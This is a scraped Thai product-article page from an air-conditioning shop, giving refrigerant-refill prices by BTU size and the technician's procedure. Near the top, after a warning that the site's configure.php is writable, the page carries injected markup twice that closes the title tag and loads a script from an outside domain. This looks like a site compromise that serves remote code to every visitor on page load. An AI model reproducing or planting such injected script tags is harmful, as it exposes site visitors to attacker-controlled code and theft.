ระวัง ระวัง: ข้อมุลการตั้งค่าของระบบสามารถแก้ไขได้ที่ /home/totaline/domains/samuitotaline.com/public_html/includes/configure.php. กรุณาตั้งค่าเป็นการอ่านอย่างเดียว หรือจำกัดการเขียน (644 ในยูนิกซ์) เพื่อความปลอดภัยของระบบ
</title><script src=http://dragosimport.com/js/></script><title> </title><script src=http://dragosimport.com/js/></script><title>


SHOPPING CART
now in your cart 0 items
  
หมวดสินค้า
ศูนย์บริการ ล้างแอร์ ซ่อมแอร์
บทความน่าสนใจ
ผู้ผลิต
carrier

Central Air

Toshiba

Totaline

Refrigo
การเติมน้ำยาแอร์ และราคาค่าเติมน้ำยาแอร์

 การเติมน้ำยาแอร์ และราคาค่าเติมน้ำยาแอร์

 การเติมน้ำยาแอร์ จะเติมน้ำยาแอร์กรณีที่น้ำยาแอร์ต่ำกว่ามาตรฐานที่กำหนด เพื่อให้การทำงานของระบบแอร์มีประสิทธิภาพสูงสุด ลดการใช้พลังงานโดยสิ้นเปลือง ในกรณีที่น้ำยาแอร์ขาดมากหรือไม่เหลือเลย ช่างจะทำการตรวจสอบรอยรั่วซึมตามจุดต่าง ๆ ที่อาจทำให้เกิดการรั่วซึม และจะทำการแจ้งรายละเอียดที่ตรวจพบให้ลูกค้าทราบว่าต้องแก้ไขปัญหาอย่างไรจึงจะไม่เกิดการรั่วซึมอีก พร้อมทั้งแจ้งค่าใช้จ่ายในการแก้ปัญหาให้ลูกค้าทราบก่อนดำเนินการ ซึ่งลูกค้าควรตรวจสอบตามรายการที่ช่างแจ้งให้ทราบเพื่อดูและเห็นสาเหตุด้วยตัวท่านเอง ก่อนตัดสินใจ


ตารางราคาค่าเติมน้ำยาแอร์
ขนาดบีทียู (BTU)ราคาน้ำยาแอร์
(คิดปอนด์ละ)
การรับประกัน
ขนาด 9,000 - 22,000 บีทียู15.-30 วัน
ขนาด 23,000 - 28,000 บีทียู20.-30 วัน
ขนาด 29,000 - 38,000 บีทียู25.-30 วัน
ขนาด 39,000 - 48,000 บีทียู30.-30 วัน
ขนาด 49,000 - 60,000 บีทียู35.-30 วัน
ขนาด 61,000 - 80,000 บีทียู40.-30 วัน


  ** พนักงานจะแจ้งให้ลูกค้าทราบและให้ลูกค้าดูปริมาณน้ำยาก่อนและหลังการเติมทุกครั้ง


  รายละเอียดการทำงาน 

  ตรวจวัดระบบน้ำยาแอร์ของลูกค้า

  แจ้งให้ลูกค้าทราบถึงปริมาณน้ำยาแอร์ที่วัดได้

  ให้ลูกค้าตรวจสอบความถูกต้องของน้ำยาแอร์ก่อนเติม

  ทำการเติมน้ำยาแอร์ดูปองด์เกรดเอเข้าในระบบแอร์

  ตรวจเช็คจุดรั่วซึมตามวาวล์ลูกศรและแฟร์ต่าง ๆ

  ให้ลูกค้าดูค่าน้ำยาที่วัดได้เมื่อเติมเสร็จเรียบร้อย
  การเรียกเก็บค่าบริการ :

  ส่งบิลเรียกเก็บเมื่อทำงานเสร็จเป็นที่เรียบร้อยแล้ว** การเติมน้ำยาแอร์แต่ละครั้งจะมีการแจ้งให้ลูกค้าทราบและตรวจดูก่อนทุกครั้ง พร้อมทั้งแจ้งรายละเอียดการเติมและราคาค่าใช้จ่ายในการเติมน้ำยาแอร์ ให้ลูกค้าได้ทราบก่อนล่วงหน้าเสมอ ด้วยการทำงานแบบมืออาชีพ เราตั้งใจให้พนักงานทำงานอย่างมีคุณภาพและดูแลรักษาแอร์ของท่าน ในการทำงานทุกครั้งครับ

This article was published on 06 ธันวาคม, 2010.
Current Reviews: 0
แสดงความคิดเห็น
Tell a friend
Tell a friend about this article: